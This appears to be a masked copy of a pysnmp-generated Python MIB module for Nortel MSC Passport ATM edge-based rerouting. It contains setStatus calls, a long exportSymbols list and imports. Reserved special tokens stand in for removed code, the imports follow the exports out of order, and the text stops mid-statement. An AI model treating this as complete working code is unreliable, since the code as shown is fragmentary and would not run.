mscAtmIfVptPnniEbrProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrConnectionRecovery.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrPathOptimization.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrSubscribedConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrConnectionRecovery.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrPathOptimization.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrSubscribedConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrEligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrIneligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoRecoverySubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoConnectionRecovered.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrConnectionRecovery.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrPathOptimization.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrSubscribedConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
mibBuilder.exportSymbols('Nortel-MsCarrier-MscPassport-AtmEbrMIB',
mscAtmIfVptPnniEbr=mscAtmIfVptPnniEbr, atmEbrGroupCA=atmEbrGroupCA,
mscAtmIfUniEbrTotalConnectionRecoveries=
mscAtmIfUniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrComponentName=
mscAtmIfPnniEbrComponentName, mscAtmIfVptPnniEbrProvEntry=
mscAtmIfVptPnniEbrProvEntry,
mscAtmIfVptVccEbrInfoTotalPathOptimizations=
mscAtmIfVptVccEbrInfoTotalPathOptimizations, mscAtmIfIispEbrOperTable=
mscAtmIfIispEbrOperTable, mscAtmIfPnniEbrStatsTable=
mscAtmIfPnniEbrStatsTable, atmEbrGroup=atmEbrGroup,
mscAtmIfUniEbrConnectionRecovery=mscAtmIfUniEbrConnectionRecovery,
mscAtmIfVptIispEbrOperEntry=mscAtmIfVptIispEbrOperEntry,
mscAtmIfVptUniEbrTotalPathOptimizations=
mscAtmIfVptUniEbrTotalPathOptimizations, mscAtmIfVptVccSrcEbrOvIndex=
mscAtmIfVptVccSrcEbrOvIndex, mscAtmIfUniEbr=mscAtmIfUniEbr,
mscAtmIfVptUniEbrPathOptimization=mscAtmIfVptUniEbrPathOptimization,
mscAtmIfUniEbrStatsEntry=mscAtmIfUniEbrStatsEntry,
mscAtmIfVpcEbrInfoStorageType=mscAtmIfVpcEbrInfoStorageType,
mscAtmIfVptIispEbrRowStatus=mscAtmIfVptIispEbrRowStatus,
mscAtmIfPnniEbrProvTable=mscAtmIfPnniEbrProvTable,
mscAtmIfVptPnniEbrSubscribedConnections=
mscAtmIfVptPnniEbrSubscribedConnections,
mscAtmIfVccEbrInfoTotalPathOptimizations=
mscAtmIfVccEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbrStatsTable=
mscAtmIfVptIispEbrStatsTable, mscAtmIfVptUniEbrProvEntry=
mscAtmIfVptUniEbrProvEntry,
mscAtmIfVptPnniEbrEligibleRecoveredConnections=
mscAtmIfVptPnniEbrEligibleRecoveredConnections,
mscAtmIfVccEbrInfoComponentName=mscAtmIfVccEbrInfoComponentName,
mscAtmIfVccSrcEbrOvRowStatusEntry=mscAtmIfVccSrcEbrOvRowStatusEntry,
mscAtmIfPnniEbrIndex=mscAtmIfPnniEbrIndex,
mscAtmIfVpcSrcEbrOvStorageType=mscAtmIfVpcSrcEbrOvStorageType,
mscAtmIfIispEbrRowStatusTable=mscAtmIfIispEbrRowStatusTable,
mscAtmIfVptPnniEbrPathOptimization=mscAtmIfVptPnniEbrPathOptimization,
mscAtmIfIispEbrProvEntry=mscAtmIfIispEbrProvEntry,
mscAtmIfVccEbrInfoRowStatusEntry=mscAtmIfVccEbrInfoRowStatusEntry,
mscAtmIfVptIispEbrStorageType=mscAtmIfVptIispEbrStorageType,
mscAtmIfVptPnniEbrStatsEntry=mscAtmIfVptPnniEbrStatsEntry,
mscAtmIfVptVccEbrInfoIndex=mscAtmIfVptVccEbrInfoIndex,
mscAtmIfPnniEbrTotalConnectionRecoveries=
mscAtmIfPnniEbrTotalConnectionRecoveries,
mscAtmIfVptVccEbrInfoOperTable=mscAtmIfVptVccEbrInfoOperTable,
mscAtmIfPnniEbrEligibleRecoveredConnections=
mscAtmIfPnniEbrEligibleRecoveredConnections,
mscAtmIfVpcEbrInfoRecoverySubscribed=
mscAtmIfVpcEbrInfoRecoverySubscribed, mscAtmIfVptVccSrcEbrOvProvTable=
mscAtmIfVptVccSrcEbrOvProvTable,
mscAtmIfVptVccEbrInfoConnectionRecovered=
mscAtmIfVptVccEbrInfoConnectionRecovered,
mscAtmIfVptIispEbrComponentName=mscAtmIfVptIispEbrComponentName,
mscAtmIfVptUniEbrComponentName=mscAtmIfVptUniEbrComponentName,
mscAtmIfVptVccEbrInfoRowStatusEntry=mscAtmIfVptVccEbrInfoRowStatusEntry,
mscAtmIfIispEbrComponentName=mscAtmIfIispEbrComponentName,
mscAtmIfPnniEbrOperEntry=mscAtmIfPnniEbrOperEntry,
mscAtmIfVptIispEbrTotalPathOptimizations=
mscAtmIfVptIispEbrTotalPathOptimizations, mscAtmIfVccEbrInfo=
mscAtmIfVccEbrInfo, mscAtmIfVptUniEbrIndex=mscAtmIfVptUniEbrIndex,
mscAtmIfVptUniEbrIneligibleRecoveredConnections=
mscAtmIfVptUniEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02
=atmEbrCapabilitiesCA02, mscAtmIfVptUniEbrRowStatusTable=
mscAtmIfVptUniEbrRowStatusTable, mscAtmIfVptVccEbrInfoRowStatusTable=
mscAtmIfVptVccEbrInfoRowStatusTable, mscAtmIfVptIispEbrProvTable=
mscAtmIfVptIispEbrProvTable, mscAtmIfVpcSrcEbrOvOptimizationSubscribed=
mscAtmIfVpcSrcEbrOvOptimizationSubscribed,
mscAtmIfIispEbrTotalPathOptimizations=
mscAtmIfIispEbrTotalPathOptimizations, mscAtmIfVccSrcEbrOvComponentName
=mscAtmIfVccSrcEbrOvComponentName,
mscAtmIfVccSrcEbrOvOptimizationSubscribed=
mscAtmIfVccSrcEbrOvOptimizationSubscribed, mscAtmIfUniEbrOperTable=
mscAtmIfUniEbrOperTable, mscAtmIfIispEbrStorageType=
mscAtmIfIispEbrStorageType, mscAtmIfVptVccSrcEbrOv=
mscAtmIfVptVccSrcEbrOv, mscAtmIfIispEbrStatsTable=
mscAtmIfIispEbrStatsTable, mscAtmIfUniEbrSubscribedConnections=
mscAtmIfUniEbrSubscribedConnections, mscAtmIfUniEbrRowStatusTable=
mscAtmIfUniEbrRowStatusTable, mscAtmIfIispEbrStatsEntry=
mscAtmIfIispEbrStatsEntry, mscAtmIfVptVccEbrInfoOperEntry=
mscAtmIfVptVccEbrInfoOperEntry, mscAtmIfIispEbrRowStatusEntry=
mscAtmIfIispEbrRowStatusEntry,
mscAtmIfVptIispEbrIneligibleRecoveredConnections=
mscAtmIfVptIispEbrIneligibleRecoveredConnections,
atmEbrCapabilitiesCA02A=atmEbrCapabilitiesCA02A,
mscAtmIfVptVccEbrInfoOptimizationSubscribed=
mscAtmIfVptVccEbrInfoOptimizationSubscribed, mscAtmIfVccEbrInfoIndex=
mscAtmIfVccEbrInfoIndex, mscAtmIfIispEbrPathOptimization=
mscAtmIfIispEbrPathOptimization, mscAtmIfPnniEbrRowStatusEntry=
mscAtmIfPnniEbrRowStatusEntry, mscAtmIfVptIispEbrSubscribedConnections=
mscAtmIfVptIispEbrSubscribedConnections, mscAtmIfUniEbrStatsTable=
mscAtmIfUniEbrStatsTable, mscAtmIfVptUniEbrStatsTable=
mscAtmIfVptUniEbrStatsTable, mscAtmIfVptPnniEbrRowStatus=
mscAtmIfVptPnniEbrRowStatus, mscAtmIfVptUniEbrProvTable=
mscAtmIfVptUniEbrProvTable, mscAtmIfVptUniEbrOperEntry=
mscAtmIfVptUniEbrOperEntry, mscAtmIfVccEbrInfoRecoverySubscribed=
mscAtmIfVccEbrInfoRecoverySubscribed, mscAtmIfVpcEbrInfo=
mscAtmIfVpcEbrInfo, mscAtmIfPnniEbrIneligibleRecoveredConnections=
mscAtmIfPnniEbrIneligibleRecoveredConnections,
mscAtmIfVpcSrcEbrOvRowStatusTable=mscAtmIfVpcSrcEbrOvRowStatusTable,
mscAtmIfVptPnniEbrIneligibleRecoveredConnections=
mscAtmIfVptPnniEbrIneligibleRecoveredConnections,
mscAtmIfVpcEbrInfoConnectionRecovered=
mscAtmIfVpcEbrInfoConnectionRecovered, mscAtmIfVccSrcEbrOvProvTable=
mscAtmIfVccSrcEbrOvProvTable, mscAtmIfVccEbrInfoRowStatusTable=
mscAtmIfVccEbrInfoRowStatusTable, mscAtmIfVccEbrInfoStorageType=
mscAtmIfVccEbrInfoStorageType, mscAtmIfVpcEbrInfoTotalPathOptimizations
=mscAtmIfVpcEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbr=
mscAtmIfVptIispEbr, mscAtmIfVpcEbrInfoRowStatus=
mscAtmIfVpcEbrInfoRowStatus, mscAtmIfVccSrcEbrOvRowStatusTable=
mscAtmIfVccSrcEbrOvRowStatusTable, mscAtmIfIispEbrConnectionRecovery=
mscAtmIfIispEbrConnectionRecovery, mscAtmIfVccSrcEbrOvProvEntry=
mscAtmIfVccSrcEbrOvProvEntry, mscAtmIfUniEbrIndex=mscAtmIfUniEbrIndex,
mscAtmIfVptUniEbrTotalConnectionRecoveries=
mscAtmIfVptUniEbrTotalConnectionRecoveries,
mscAtmIfVpcEbrInfoTotalConnectionRecoveries=
mscAtmIfVpcEbrInfoTotalConnectionRecoveries,
mscAtmIfVptVccSrcEbrOvRowStatusEntry=
mscAtmIfVptVccSrcEbrOvRowStatusEntry,
mscAtmIfIispEbrTotalConnectionRecoveries=
mscAtmIfIispEbrTotalConnectionRecoveries, mscAtmIfIispEbrRowStatus=
mscAtmIfIispEbrRowStatus, mscAtmIfVpcSrcEbrOvProvTable=
mscAtmIfVpcSrcEbrOvProvTable, mscAtmIfVptUniEbrRowStatus=
mscAtmIfVptUniEbrRowStatus, mscAtmIfPnniEbrRowStatusTable=
mscAtmIfPnniEbrRowStatusTable, mscAtmIfPnniEbrStatsEntry=
mscAtmIfPnniEbrStatsEntry, mscAtmIfVpcSrcEbrOvIndex=
mscAtmIfVpcSrcEbrOvIndex, mscAtmIfVpcEbrInfoComponentName=
mscAtmIfVpcEbrInfoComponentName, mscAtmIfVptIispEbrPathOptimization=
mscAtmIfVptIispEbrPathOptimization, mscAtmIfVpcSrcEbrOvRowStatus=
mscAtmIfVpcSrcEbrOvRowStatus, mscAtmIfVpcEbrInfoRowStatusEntry=
mscAtmIfVpcEbrInfoRowStatusEntry, mscAtmIfVptPnniEbrOperEntry=
mscAtmIfVptPnniEbrOperEntry, mscAtmIfIispEbrSubscribedConnections=
mscAtmIfIispEbrSubscribedConnections, mscAtmIfVccSrcEbrOv=
mscAtmIfVccSrcEbrOv, mscAtmIfVptIispEbrEligibleRecoveredConnections=
mscAtmIfVptIispEbrEligibleRecoveredConnections, mscAtmIfUniEbrProvEntry
=mscAtmIfUniEbrProvEntry, mscAtmIfVpcEbrInfoRowStatusTable=
mscAtmIfVpcEbrInfoRowStatusTable, mscAtmIfVptPnniEbrComponentName=
mscAtmIfVptPnniEbrComponentName, mscAtmIfVptPnniEbrConnectionRecovery=
mscAtmIfVptPnniEbrConnectionRecovery, mscAtmIfVptVccSrcEbrOvRowStatus=
mscAtmIfVptVccSrcEbrOvRowStatus, mscAtmIfVptIispEbrRowStatusTable=
mscAtmIfVptIispEbrRowStatusTable, mscAtmIfVptPnniEbrStorageType=
mscAtmIfVptPnniEbrStorageType, mscAtmIfVptVccEbrInfoStorageType=
mscAtmIfVptVccEbrInfoStorageType, mscAtmIfIispEbr=mscAtmIfIispEbr,
mscAtmIfVccEbrInfoOperEntry=mscAtmIfVccEbrInfoOperEntry,
mscAtmIfVptPnniEbrTotalConnectionRecoveries=
mscAtmIfVptPnniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrRowStatus=
mscAtmIfPnniEbrRowStatus, mscAtmIfVpcSrcEbrOvProvEntry=
mscAtmIfVpcSrcEbrOvProvEntry, mscAtmIfVccEbrInfoRowStatus=
mscAtmIfVccEbrInfoRowStatus, mscAtmIfVptIispEbrIndex=
mscAtmIfVptIispEbrIndex, mscAtmIfVpcEbrInfoOperEntry=
mscAtmIfVpcEbrInfoOperEntry, mscAtmIfVptIispEbrOperTable=
mscAtmIfVptIispEbrOperTable, mscAtmIfUniEbrProvTable=
mscAtmIfUniEbrProvTable, mscAtmIfPnniEbrPathOptimization=
mscAtmIfPnniEbrPathOptimization, mscAtmIfVpcEbrInfoStatsTable=
mscAtmIfVpcEbrInfoStatsTable, mscAtmIfVccSrcEbrOvIndex=
mscAtmIfVccSrcEbrOvIndex, mscAtmIfPnniEbrSubscribedConnections=
mscAtmIfPnniEbrSubscribedConnections, mscAtmIfVptIispEbrRowStatusEntry=
mscAtmIfVptIispEbrRowStatusEntry, mscAtmIfIispEbrProvTable=
mscAtmIfIispEbrProvTable, mscAtmIfVptVccSrcEbrOvComponentName=
mscAtmIfVptVccSrcEbrOvComponentName,
mscAtmIfVptUniEbrConnectionRecovery=mscAtmIfVptUniEbrConnectionRecovery,
mscAtmIfVccSrcEbrOvStorageType=mscAtmIfVccSrcEbrOvStorageType,
mscAtmIfVpcSrcEbrOv=mscAtmIfVpcSrcEbrOv,
mscAtmIfVptPnniEbrRowStatusTable=mscAtmIfVptPnniEbrRowStatusTable,
mscAtmIfUniEbrEligibleRecoveredConnections=
mscAtmIfUniEbrEligibleRecoveredConnections,
mscAtmIfVptUniEbrRowStatusEntry=mscAtmIfVptUniEbrRowStatusEntry,
mscAtmIfVccSrcEbrOvRowStatus=mscAtmIfVccSrcEbrOvRowStatus,
mscAtmIfIispEbrEligibleRecoveredConnections=
mscAtmIfIispEbrEligibleRecoveredConnections, mscAtmIfPnniEbrOperTable=
mscAtmIfPnniEbrOperTable, mscAtmIfVpcEbrInfoOperTable=
mscAtmIfVpcEbrInfoOperTable, mscAtmIfVpcEbrInfoStatsEntry=
mscAtmIfVpcEbrInfoStatsEntry, mscAtmIfVptUniEbrStorageType=
mscAtmIfVptUniEbrStorageType, mscAtmIfVccEbrInfoStatsTable=
mscAtmIfVccEbrInfoStatsTable, mscAtmIfVptVccEbrInfoStatsTable=
mscAtmIfVptVccEbrInfoStatsTable, mscAtmIfUniEbrPathOptimization=
mscAtmIfUniEbrPathOptimization, mscAtmIfVptPnniEbrStatsTable=
mscAtmIfVptPnniEbrStatsTable, mscAtmIfVptUniEbrSubscribedConnections=
mscAtmIfVptUniEbrSubscribedConnections, mscAtmIfVptVccEbrInfo=
mscAtmIfVptVccEbrInfo, mscAtmIfPnniEbrConnectionRecovery=
mscAtmIfPnniEbrConnectionRecovery,
mscAtmIfVccEbrInfoConnectionRecovered=
mscAtmIfVccEbrInfoConnectionRecovered, mscAtmIfVccEbrInfoStatsEntry=
mscAtmIfVccEbrInfoStatsEntry,
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries=
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries,
mscAtmIfUniEbrStorageType=mscAtmIfUniEbrStorageType,
mscAtmIfVptUniEbrStatsEntry=mscAtmIfVptUniEbrStatsEntry,
mscAtmIfVptPnniEbrProvTable=mscAtmIfVptPnniEbrProvTable,
mscAtmIfVccSrcEbrOvRecoverySubscribed=
mscAtmIfVccSrcEbrOvRecoverySubscribed, atmEbrCapabilities=
atmEbrCapabilities, mscAtmIfUniEbrComponentName=
mscAtmIfUniEbrComponentName, mscAtmIfPnniEbrTotalPathOptimizations=
mscAtmIfPnniEbrTotalPathOptimizations,
mscAtmIfUniEbrIneligibleRecoveredConnections=
mscAtmIfUniEbrIneligibleRecoveredConnections, mscAtmIfPnniEbr=
mscAtmIfPnniEbr, mscAtmIfVptIispEbrProvEntry=
mscAtmIfVptIispEbrProvEntry, mscAtmIfUniEbrRowStatusEntry=
mscAtmIfUniEbrRowStatusEntry, mscAtmIfVptPnniEbrRowStatusEntry=
mscAtmIfVptPnniEbrRowStatusEntry, mscAtmIfVpcEbrInfoIndex=
mscAtmIfVpcEbrInfoIndex, mscAtmIfVptVccSrcEbrOvProvEntry=
mscAtmIfVptVccSrcEbrOvProvEntry, mscAtmIfVccEbrInfoOperTable=
mscAtmIfVccEbrInfoOperTable, mscAtmIfVptVccEbrInfoStatsEntry=
mscAtmIfVptVccEbrInfoStatsEntry, atmEbrGroupCA02A=atmEbrGroupCA02A,
mscAtmIfVccEbrInfoOptimizationSubscribed=
mscAtmIfVccEbrInfoOptimizationSubscribed,
mscAtmIfVptVccSrcEbrOvRowStatusTable=
mscAtmIfVptVccSrcEbrOvRowStatusTable, atmEbrMIB=atmEbrMIB,
mscAtmIfVptVccEbrInfoRecoverySubscribed=
mscAtmIfVptVccEbrInfoRecoverySubscribed,
mscAtmIfVpcSrcEbrOvRowStatusEntry=mscAtmIfVpcSrcEbrOvRowStatusEntry,
mscAtmIfVptVccEbrInfoRowStatus=mscAtmIfVptVccEbrInfoRowStatus,
mscAtmIfVptIispEbrStatsEntry=mscAtmIfVptIispEbrStatsEntry,
mscAtmIfPnniEbrStorageType=mscAtmIfPnniEbrStorageType,
mscAtmIfPnniEbrProvEntry=mscAtmIfPnniEbrProvEntry,
mscAtmIfVptUniEbrOperTable=mscAtmIfVptUniEbrOperTable,
mscAtmIfIispEbrIneligibleRecoveredConnections=
mscAtmIfIispEbrIneligibleRecoveredConnections,
mscAtmIfVptIispEbrConnectionRecovery=
mscAtmIfVptIispEbrConnectionRecovery, mscAtmIfVptUniEbr=
mscAtmIfVptUniEbr, atmEbrGroupCA02=atmEbrGroupCA02,
mscAtmIfVptIispEbrTotalConnectionRecoveries=
mscAtmIfVptIispEbrTotalConnectionRecoveries,
mscAtmIfUniEbrTotalPathOptimizations=
mscAtmIfUniEbrTotalPathOptimizations,
mscAtmIfVpcSrcEbrOvRecoverySubscribed=
mscAtmIfVpcSrcEbrOvRecoverySubscribed, mscAtmIfVptPnniEbrOperTable=
mscAtmIfVptPnniEbrOperTable,
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed=
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed,
mscAtmIfVptUniEbrEligibleRecoveredConnections=
mscAtmIfVptUniEbrEligibleRecoveredConnections,
mscAtmIfVpcEbrInfoOptimizationSubscribed=
mscAtmIfVpcEbrInfoOptimizationSubscribed, mscAtmIfVptPnniEbrIndex=
mscAtmIfVptPnniEbrIndex, mscAtmIfUniEbrRowStatus=
mscAtmIfUniEbrRowStatus, mscAtmIfUniEbrOperEntry=
mscAtmIfUniEbrOperEntry, mscAtmIfVptVccSrcEbrOvStorageType=
mscAtmIfVptVccSrcEbrOvStorageType,
mscAtmIfVptPnniEbrTotalPathOptimizations=
mscAtmIfVptPnniEbrTotalPathOptimizations,
mscAtmIfVpcSrcEbrOvComponentName=mscAtmIfVpcSrcEbrOvComponentName,
mscAtmIfVptVccEbrInfoComponentName=mscAtmIfVptVccEbrInfoComponentName,
mscAtmIfIispEbrOperEntry=mscAtmIfIispEbrOperEntry,
mscAtmIfVptVccSrcEbrOvRecoverySubscribed=
mscAtmIfVptVccSrcEbrOvRecoverySubscribed, mscAtmIfIispEbrIndex=
mscAtmIfIispEbrIndex, atmEbrCapabilitiesCA=atmEbrCapabilitiesCA,
mscAtmIfVccEbrInfoTotalConnectionRecoveries=
mscAtmIfVccEbrInfoTotalConnectionRecoveries)
<|reserved_special_token_1|>
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols('ASN1',
'Integer', 'ObjectIdentifier', 'OctetString')
NamedValues, = mibBuilder.importSymbols('ASN1-ENUMERATION', 'NamedValues')
(ValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint,
ConstraintsUnion, ConstraintsIntersection) = (mibBuilder.importSymbols(
'ASN1-REFINEMENT', 'ValueRangeConstraint', 'SingleValueConstraint',
'ValueSizeConstraint', 'ConstraintsUnion', 'ConstraintsIntersection'))
(mscAtmIfIndex, mscAtmIfVptIndex, mscAtmIfVcc, mscAtmIfVptVccIndex,
mscAtmIfVpc, mscAtmIfVptVcc, mscAtmIfVccIndex, mscAtmIfVpcIndex) = (
mibBuilder.importSymbols('Nortel-MsCarrier-MscPassport-AtmCoreMIB',
'mscAtmIfIndex', 'mscAtmIfVptIndex', 'mscAtmIfVcc',
'mscAtmIfVptVccIndex', 'mscAtmIfVpc', 'mscAtmIfVptVcc',
'mscAtmIfVccIndex', 'mscAtmIfVpcIndex'))
mscAtmIfIisp, mscAtmIfVptIisp, mscAtmIfVptIispIndex, mscAtmIfIispIndex = (
mibBuilder.importSymbols('Nortel-MsCarrier-MscPassport-AtmIispMIB',
'mscAtmIfIisp', 'mscAtmIfVptIisp', 'mscAtmIfVptIispIndex',
'mscAtmIfIispIndex'))
(mscAtmIfVpcSrc, mscAtmIfVptVccSrcIndex, mscAtmIfVccSrcIndex,
mscAtmIfVptVccSrc, mscAtmIfVpcSrcIndex, mscAtmIfVccSrc) = (mibBuilder.
importSymbols('Nortel-MsCarrier-MscPassport-AtmNetworkingMIB',
'mscAtmIfVpcSrc', 'mscAtmIfVptVccSrcIndex', 'mscAtmIfVccSrcIndex',
